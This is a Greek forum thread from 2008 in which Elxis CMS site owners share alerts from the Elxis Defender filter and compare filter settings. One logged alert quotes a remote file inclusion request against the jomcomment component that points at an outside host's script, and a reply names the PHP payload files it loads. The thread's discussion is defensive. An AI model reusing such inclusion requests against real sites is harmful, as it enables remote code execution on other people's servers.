Elxis CMS Forum
Ελληνικό Forum => Ασφάλεια => Topic started by: xenios on January 06, 2008, 19:25:58
-
Do not reply to this e-mail
This is a notification e-mail from Elxis Defender
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 62.48.192.42 (blocked)
DATE: 06-01-2008 06:55:03
Attack was logged
Site turned offline for 30 seconds
Note: Elxis Defender wont send you another notification for the next 5 minutes even if more attacks occured.
---------------------------------------------------
ELXIS DEFENDER by ELXIS Team
---------------------------------------------------
Μπαράβο σε όλους μας!!!
Στην ομάδα που έφτιαξε τον defender,
σε εμένα που το είχα ενεργό
και τέλος στον επίδοξο που το δοκίμασε... ;D
-
εγω εχω βαλει και το φιλτρο
mosConfig_
αλλα θελει προσοχη αν πας να κανεις edit στο template ...index...και css...πρεπει να απενεργοποιησης τον defender γιατι ακομα και απο το administrator panel σε θεωρει επιτιθεμενο και σε μπλοκαρει!!!!!!!!
-
Για σου μπαμπη!!!!
και εγώ το έχω αυτό το φίλτρο και είναι εκεί που δέχτηκα και την επίθεση....
-
Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 67.15.181.25 (blocked)
Requested URI: /index.php?option=com_jomcomment&task=trackback&id=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do???
DATE: 30-01-2008 17:30:42
Attack was logged
Που χτυπήσανε? Και γιατί γράφει αυτό το link?
-
Νίκο, αν δώσεις το url που πήγαν να σου βάλουν, θα δεις τις php εντολές που πήγαν να τρέξουν
το αρχείο που πήγαν να τρέξουν είναι το
http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do
που φορτώνει το txt αρχείο σε php
http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/bot.txt
Η επίθεση δεν έγινε στο Elxis, αλλά στο jomcomment . Δεν ξέρω αν το έχεις, μπορεί να το δοκίμαζαν απλά (έχω πιάσει κι εγώ πολλούς που δοκιμάζουν components ή modules που ξέρουν οτι έχουν τρύπες και δοκιμάζουν joomla sites μπας και τα έχουν και τα τρυπήσουν). Αν το έχεις πάντως, καλό είναι να το πετάξεις από το Elxis σου. Έτσι και σε βρήκε ένας, θα ακολουθήσουν μαζικά και άλλοι
-
Το περίεργο είναι ότι το συγκεκριμένο component δεν το έχω εκτός και εάν το μπέρδεψαν με το acocomment.
Φυσικά πήρα ένα backup.
Ευχαριστώ Arxos :)
-
nikos σε ποιο φιλτρο χτυπησαν?
-
Στο mosConfig.
Να είναι καλά το Elxis Defender ;)
-
εχεις και floodblocker?εχω και εγω mosconfig φιλτρο αλλα δεν ξερω ποσο αργο μου κανει το site γιατι εχω δυο φιλτρα ,εχω και το select union,και αν βαλω και floodblocker μερικες φορες πεφτει το site.
-
Εμένα όλα πάνε μία χαρά και με τα δύο μαζί. Απλά έχω ανοίξει λίγο τα διαστήματα στο floodblocker . Κανένα πρόβλημα ειδικά το βασικό μου σίτε το παργαροομς που έχει αρκετές επισκέψεις.
-
εχεις και floodblocker?εχω και εγω mosconfig φιλτρο αλλα δεν ξερω ποσο αργο μου κανει το site γιατι εχω δυο φιλτρα ,εχω και το select union,και αν βαλω και floodblocker μερικες φορες πεφτει το site.
:o για κοίταξε λίγο τον server... εγώ τα έχω όλα του defender + μερικά ακόμα για πιο πονηρούς (Google it) και δεν έχω κανένα πρόβλημα!
-
Ο defender καθυστερεί λίγο το άνοιγμα των σελίδων και όσα περισσότερα φίλτρα βάλεις τόσο περισσότερο καθυστερεί. Η καθυστέρηση βέβαια είναι της τάξης των μιλι-δευτερολέπτων, μην φανταστείτε τίποτα τρελό. Θα έλεγα ότι μέχρι 10 φίλτρα είναι ΟΚ αλλά εξαρτάται από το site σας και το φόρτο και την ταχύτητα του server. Μπορείτε να βάλετε και 50 και να μην έχετε πρόβλημα. Εξαρτάται. Πειραματιστείτε. Ίσως 4-5 φίλτρα να είναι αρκετά.
Σημείωση: το elxis 2008.0 έχει βελτιωμένη έκδοση του elxis defender, πολύ πιο αποτελεσματική. Αυτή η έκδοση συμπεριλαμβάνεται και στην DEV έκδοση του Elxis που κυκλοφόρησε. Επίσης το 2008.0 έχει ενσωματωμένη δυνατότητα Benchmark οπότε μπορείτε να μετρήσετε την καθυστέρηση που προκαλεί ο defender στο φόρτωμα των σελίδων. Στην ενότητα "Elxis 2008 developers guide" του forum υπάρχουν οδηγίες χρήσης του Benchmark.
-
nikos65, ποιο φιλτρο έπιασε αυτό το log ? ποτέ δεν έχω δει τέτοια ανάλυση στα log του defender και μου κάνει εντύπωση, μπας και δε χρησιμοποιώ τα σωστά φίλτρα
ρε παιδιά, μιας και τα συζητάμε όλα, δε μου λέτε τι φίλτρα χρησιμοποιείτε ?
Εγώ χρησιμοποιώ από τον πίνακα των φίλτρων, αυτά που είναι με κόκκινα (υπέθεσα οτι είναι τα πιο συμαντικά για να σήμειώνονται με κόκκινα) .. 12 στον αριθμό αν θυμάμαι καλά
-
Είναι το mosconfig και η ανάλυση είναι από το Elxis defender 2008. ;)
-
..... και η ανάλυση είναι από το Elxis defender 2008. ;)
Ε πες μου έτσι .. πολύ καλή ανάλυση .. ξέρεις ακριβώς τι έχουν κάνει
-
15 φιλτράκια στο χαλαρό και κανένα πρόβλημα από άποψη καθυστέρησης. :P Προτιμώ μια καθυστέρηση των mseconds παρά τπτ άλλο δυσάρεστο.
-
σίγουρα, η καθυστέρηση δεν θα έπρεπε να μας προβληματίζει, αν έχει να κάνει με την ασφάλεια του site (έχω πάθει και ξέρω !!)
Supernet, σωστά έχω καταλάβει οτι τα κόκκινα φίλτρα που γράφονται στο παράθηρο του defender είναι τα πιο συμαντικά ; (από μόνος μου έχω βγάλει αυτό το συμπέρασμα, μην βαράτε !!).
Αυτά είναι μόνο 12. Ποιά άλλα πιστεύεις από την εμπειρία σου οτι χρειάζονται να ενεργοποιηθούν?
Sorry εαν επαναλαμβάνομαι, και άλλη φορά το έχω ζητήσει από το forum, και η απάντηση που έχω πάρει είναι "πειραματίσου κτλ". Αλλα ρε παιδιά, σε μένα, οι εντολές των φιλτρων είναι ΟΛΕΣ άγνωστες λέξεις .. ούτε που ξέρω τι κάνουν για να καταλάβω τη συμαντικότητά τους (πέραν του mosconfig). Φυσικά, δεν ρωτάω για να κάτσει κάποιος να μου εξυγήσει μία προς μία την κάθε εντολή. Απλά, μια υπόδειξη, για να ελαχιστοποιήσουμε τις πιθανότητες πετηχυμένης επίθεσης ..
-
εμένα πάντως με έχουν ρημάξει τον τελευταίο μήνα στις επιθέσεις από πορτογαλία..... >:( ??? ποτέ μου δεν είχα μέχρι τώρα.
-
Υπάρχει και η δυνατότητα να μπλοκάρεις μία χώρα με άλλα παρατράγουδα βέβαια.
-
Supernet, σωστά έχω καταλάβει οτι τα κόκκινα φίλτρα που γράφονται στο παράθηρο του defender είναι τα πιο συμαντικά ; (από μόνος μου έχω βγάλει αυτό το συμπέρασμα, μην βαράτε !!).
Αυτά είναι μόνο 12. Ποιά άλλα πιστεύεις από την εμπειρία σου οτι χρειάζονται να ενεργοποιηθούν?
Δες
-
thank you man ;D ;D ;D
-
Είναι το mosconfig και η ανάλυση είναι από το Elxis defender 2008. ;)
πηρες τον φακελλο defender 2008 και αντικατεστησες τον deferder folder 2006?.....αν ναι εκανα το ιδιο και δουλευει.....μπορουμε δηλαδη να χρησιμοποιησουμε απο το 2008 και αλλα folders(ισως οχι τα πολυ βασικα η εκεινα που υπεστησαν μεγαλες αλλαγες)...ρωταω γιατι την αλλαγη με τον defender την εκανα σε ενα μικρο site για δοκιμη,αν οντως δεν υπαρχει προβλημα να κανω την αντικατασταση και σε αλλα.
-
Όλα τα φίλτρα, και ειδικά αυτά που είναι για sql injection (βάση δεδομένων), μπορούν να παρακαμφθούν με κάποιες τεχνικές (μην περιμένετε να πω δημόσια). Το φρόνιμο είναι να μην ξέρει κανείς τι φίλτρα χρησιμοποιείτε. Συνεπώς ότι λέτε, καλό είναι να το λέτε με προσωπικά μηνύματα ή e-mail και όχι δημοσίως. ;)
-
datahell, σεβαστό :o